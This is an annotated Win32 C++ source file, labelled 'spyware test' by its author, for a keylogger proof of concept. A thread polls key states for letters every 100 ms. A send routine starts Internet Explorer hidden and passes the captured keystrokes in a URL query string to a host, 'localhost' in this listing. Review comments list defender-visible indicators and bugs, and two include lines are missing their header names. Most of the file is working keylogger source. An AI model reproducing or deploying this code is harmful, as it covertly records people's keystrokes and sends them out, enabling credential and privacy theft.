// Win32 proof-of-concept labelled "spyware test" by its author, annotated for review.
//
// What the code does, as written:
//   * registers a window class and creates one top-level window;
//   * on WM_CREATE starts a worker thread (Logger) that polls GetAsyncKeyState
//     for the letters 'A'..'Z' every 100 ms and buffers the ones found down;
//   * once TEXT_SIZE letters are buffered, SendLogData starts PRGRM_NAME with
//     SW_HIDE and the command line
//       "<PRGRM_NAME> http://<HOST_NAME><FILE_PATH>?<captured letters>",
//     then posts WM_CLOSE to the browser window it finds by title.
//
// Behaviour visible to a defender, all taken from the calls below:
//   * a process polling global key state on a 100 ms loop;
//   * a browser child process created with SW_HIDE by a non-browser parent;
//   * the captured text travels in the URL query string, so it is present in
//     the child's command line (and, presumably, in the resulting HTTP request).
// HOST_NAME is "localhost" in this listing, i.e. the URL points at the local machine.

#define WIN32_LEAN_AND_MEAN
// NOTE(review): both header names are missing from this listing (likely lost
// together with their angle brackets when the page was extracted). The code
// needs the Win32 API declarations, so one of them is presumably <windows.h>;
// confirm against the original file.
#include
#include
// Links the Winsock import library, although no Winsock function is called in
// the code visible here.
#pragma comment(lib, "WSock32.lib")

// Number of buffered letters that triggers a send; the capture buffer in
// Logger is TEXT_SIZE + 1 bytes.
#define TEXT_SIZE (15)
// Host and path that are concatenated into the request URL.
#define HOST_NAME "localhost"
#define FILE_PATH "/save.cgi"
// Used only to build the window title SendLogData searches for; presumably the
// title of the page served at FILE_PATH (not shown here).
#define FILE_TITLE "spyware test"
// Program started to issue the request. Note that the path contains spaces.
#define PRGRM_NAME "C:\\Program Files\\Internet Explorer\\iexplore.exe"

LPCTSTR szWindowClass = TEXT("spy");        // window class name
LPCTSTR szTitle = TEXT("IE spy ver0.01");   // window caption

// Build switch, disabled in this listing: when HIDE is defined, InitInstance
// skips ShowWindow/UpdateWindow, so the window is created but never displayed.
//#define HIDE

HINSTANCE hInst;    // module instance, stored by InitInstance

ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

// State shared between the window procedure and the Logger thread.
typedef struct{
	BOOL ThreadFlag;    // TRUE while Logger should keep running
	HWND hWnd;          // main window, destroyed by Logger when a send fails
} DATA;

DWORD WINAPI Logger(LPVOID lpvoid);
BOOL SendLogData(char *MainMemory, UINT len);

// Program entry point: registers the class, creates the window and runs the
// message loop until GetMessage returns 0 or -1.
// Returns FALSE if the window cannot be created, otherwise msg.wParam.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
	MSG msg;
	// The return value of MyRegisterClass is not checked; a failed registration
	// would surface as a CreateWindow failure in InitInstance.
	MyRegisterClass(hInstance);
	if (!InitInstance (hInstance, nCmdShow))
	{
		return FALSE;
	}
	BOOL bRet;
	while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0)
	{
		// -1 is treated as an error and ends the loop.
		if(bRet == -1)
		{
			break;
		}
		// No accelerator table is supplied (NULL handle is passed).
		if (!TranslateAccelerator(msg.hwnd, NULL, &msg))
		{
			TranslateMessage(&msg);
			DispatchMessage(&msg);
		}
	}
	// NOTE(review): msg.wParam is also returned after the -1 break above, where
	// msg does not necessarily hold a quit message.
	return (int) msg.wParam;
}

// Fills a WNDCLASSEX for the class named szWindowClass, with WndProc as the
// window procedure, and registers it.
// Returns the value of RegisterClassEx.
ATOM MyRegisterClass(HINSTANCE hInstance)
{
	WNDCLASSEX wcex;
	wcex.cbSize = sizeof(WNDCLASSEX);
	wcex.style = CS_HREDRAW | CS_VREDRAW;
	wcex.lpfnWndProc = (WNDPROC)WndProc;
	wcex.cbClsExtra = 0;
	wcex.cbWndExtra = 0;
	wcex.hInstance = hInstance;
	// No icon resource name is given for either icon (NULL is passed).
	wcex.hIcon = LoadIcon(hInstance, NULL);
	wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
	wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
	wcex.lpszMenuName = (LPCTSTR)NULL;
	wcex.lpszClassName = szWindowClass;
	wcex.hIconSm = LoadIcon(wcex.hInstance, NULL);
	return RegisterClassEx(&wcex);
}

// Stores the instance handle in hInst and creates the main window.
// The window is shown only when HIDE is not defined.
// Returns FALSE if CreateWindow fails, TRUE otherwise.
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
	HWND hWnd;
	hInst = hInstance;
	hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
	if (!hWnd)
	{
		return FALSE;
	}
#ifndef HIDE
	ShowWindow(hWnd, nCmdShow);
	UpdateWindow(hWnd);
#endif
	return TRUE;
}

// Window procedure. Starts the Logger thread when the window is created and
// stops it when the window is destroyed; every other message goes to
// DefWindowProc.
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	// Both objects are static so that they outlive a single message and can be
	// handed to the worker thread by address.
	static DATA Data;
	static HANDLE Thread;
	switch (message)
	{
	case WM_CREATE:
		Data.hWnd = hWnd;
		Data.ThreadFlag = TRUE;
		DWORD ID;
		// If the thread cannot be started the window is destroyed again.
		if((Thread = CreateThread(NULL, 0, Logger, (LPVOID)&Data, 0, &ID)) == NULL){
			DestroyWindow(hWnd);
		}
		break;
	case WM_DESTROY:
		// NOTE(review): ThreadFlag is a plain BOOL written here and read in
		// Logger; no synchronization is visible in this file.
		Data.ThreadFlag = FALSE;
		// Gives Logger up to 3 seconds to leave its loop. The result is not checked.
		// NOTE(review): after a failed CreateThread, Thread is NULL when this runs.
		WaitForSingleObject(Thread, 3000);
		CloseHandle(Thread);
		PostQuitMessage(0);
		break;
	default:
		return DefWindowProc(hWnd, message, wParam, lParam);
	}
	return 0;
}

// Worker thread. lpvoid is the DATA object owned by WndProc.
//
// Every 100 ms it tests the 26 virtual-key codes 'A'..'Z' and appends one
// character to MainMemory for each key whose high (0x8000) state bit is set.
// Consequences of this sampling that follow from the code:
//   * only letters are recorded, always as upper case;
//   * a key that stays down is recorded again on every pass;
//   * within one pass letters are stored in alphabetical order, not in the
//     order they were pressed.
// When at least TEXT_SIZE characters are buffered the text is passed to
// SendLogData and the buffer is cleared.
// Returns 0 when Data->ThreadFlag becomes FALSE.
DWORD WINAPI Logger(LPVOID lpvoid)
{
	DATA *Data = (DATA *)lpvoid;
	UINT len = 0;
	// One spare byte so that TEXT_SIZE characters stay NUL-terminated.
	char MainMemory[TEXT_SIZE + 1];
	ZeroMemory(MainMemory, sizeof(MainMemory));
	while( Data->ThreadFlag ){
		// NOTE(review): len is only checked after all 26 tests below. With
		// several keys down in one pass, len can pass TEXT_SIZE, so the
		// terminating NUL at index TEXT_SIZE can be overwritten and a write can
		// land past the end of MainMemory.
		if(GetAsyncKeyState('A') & 0x8000){ MainMemory[len] = 'A', len++; }
		if(GetAsyncKeyState('B') & 0x8000){ MainMemory[len] = 'B', len++; }
		if(GetAsyncKeyState('C') & 0x8000){ MainMemory[len] = 'C', len++; }
		if(GetAsyncKeyState('D') & 0x8000){ MainMemory[len] = 'D', len++; }
		if(GetAsyncKeyState('E') & 0x8000){ MainMemory[len] = 'E', len++; }
		if(GetAsyncKeyState('F') & 0x8000){ MainMemory[len] = 'F', len++; }
		if(GetAsyncKeyState('G') & 0x8000){ MainMemory[len] = 'G', len++; }
		if(GetAsyncKeyState('H') & 0x8000){ MainMemory[len] = 'H', len++; }
		if(GetAsyncKeyState('I') & 0x8000){ MainMemory[len] = 'I', len++; }
		if(GetAsyncKeyState('J') & 0x8000){ MainMemory[len] = 'J', len++; }
		if(GetAsyncKeyState('K') & 0x8000){ MainMemory[len] = 'K', len++; }
		if(GetAsyncKeyState('L') & 0x8000){ MainMemory[len] = 'L', len++; }
		if(GetAsyncKeyState('M') & 0x8000){ MainMemory[len] = 'M', len++; }
		if(GetAsyncKeyState('N') & 0x8000){ MainMemory[len] = 'N', len++; }
		if(GetAsyncKeyState('O') & 0x8000){ MainMemory[len] = 'O', len++; }
		if(GetAsyncKeyState('P') & 0x8000){ MainMemory[len] = 'P', len++; }
		if(GetAsyncKeyState('Q') & 0x8000){ MainMemory[len] = 'Q', len++; }
		if(GetAsyncKeyState('R') & 0x8000){ MainMemory[len] = 'R', len++; }
		if(GetAsyncKeyState('S') & 0x8000){ MainMemory[len] = 'S', len++; }
		if(GetAsyncKeyState('T') & 0x8000){ MainMemory[len] = 'T', len++; }
		if(GetAsyncKeyState('U') & 0x8000){ MainMemory[len] = 'U', len++; }
		if(GetAsyncKeyState('V') & 0x8000){ MainMemory[len] = 'V', len++; }
		if(GetAsyncKeyState('W') & 0x8000){ MainMemory[len] = 'W', len++; }
		if(GetAsyncKeyState('X') & 0x8000){ MainMemory[len] = 'X', len++; }
		if(GetAsyncKeyState('Y') & 0x8000){ MainMemory[len] = 'Y', len++; }
		if(GetAsyncKeyState('Z') & 0x8000){ MainMemory[len] = 'Z', len++; }
		// Buffer full (len >= TEXT_SIZE): hand the text over and start again.
		if( !(TEXT_SIZE > len) ){
			// SendLogData returns TRUE on failure; in that case the main window
			// is asked to go away, from this thread.
			if(SendLogData(MainMemory, len)){
				DestroyWindow(Data->hWnd);
			}
			ZeroMemory(MainMemory, sizeof(MainMemory));
			len = 0;
		}
		Sleep(100);
	}
	return 0;
}

// Starts PRGRM_NAME hidden with a URL whose query string is the captured text,
// then closes the browser window it finds by title.
//
// MainMemory: NUL-terminated captured text; it is copied with "%s", so the
//             copy runs to the first NUL rather than to len.
// len:        number of captured characters, used only to size the buffer.
// Returns FALSE on success and TRUE on failure (note the inverted sense).
BOOL SendLogData(char *MainMemory, UINT len)
{
	int SendAllDataLen;
	SendAllDataLen = (int)strlen(PRGRM_NAME);
	SendAllDataLen += (int)strlen(HOST_NAME);
	SendAllDataLen += (int)strlen(FILE_PATH);
	SendAllDataLen += len;
	// The extra 16 bytes cover the 11 literal characters of the format string
	// and the terminator.
	char *SendAllData = new char[SendAllDataLen + 16];
	// NOTE(review): the size above trusts len, while "%s" copies up to the
	// first NUL in MainMemory; the two agree only if the caller kept the
	// buffer terminated (see the note in Logger).
	// NOTE(review): char buffers are mixed with TCHAR APIs and TEXT() is
	// applied to macro names, so this presumably only builds as ANSI - confirm.
	wsprintf(SendAllData, "%s http://%s%s?%s\r\n", TEXT(PRGRM_NAME), TEXT(HOST_NAME), TEXT(FILE_PATH), MainMemory);
	STARTUPINFO SI;
	ZeroMemory(&SI, sizeof(SI));
	SI.cb = sizeof(SI);
	// SW_HIDE is requested for the child's window. STARTF_USESTDHANDLES is set
	// although the three standard-handle fields are left zero by ZeroMemory.
	SI.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	SI.wShowWindow = SW_HIDE;
	PROCESS_INFORMATION PI;
	// NOTE(review): the application name is NULL and the executable path in the
	// command line contains spaces without quotes, which is the unquoted
	// search path weakness (CWE-428). Handle inheritance is enabled (TRUE).
	if(CreateProcess(NULL, SendAllData, NULL, NULL, TRUE, 0, NULL, NULL, &SI, &PI) != TRUE){
		// NOTE(review): SendAllData is not freed on this path.
		return TRUE;
	}
	char Title[256];
	wsprintf(Title, "%s - Microsoft Internet Explorer", TEXT(FILE_TITLE));
	HWND ieWindow;
	// The browser window is located purely by its exact caption.
	if((ieWindow = FindWindow(NULL, Title)) == NULL){
		// NOTE(review): SendAllData and both handles in PI are leaked on this
		// path, and the child process is left running.
		return TRUE;
	}
	PostMessage(ieWindow ,WM_CLOSE, 0, 0);
	// Waits up to 3 seconds for the browser to exit; the result is not checked.
	WaitForSingleObject(PI.hProcess, 3000);
	CloseHandle(PI.hProcess);
	// NOTE(review): PI.hThread is never closed.
	delete []SendAllData;
	return FALSE;
}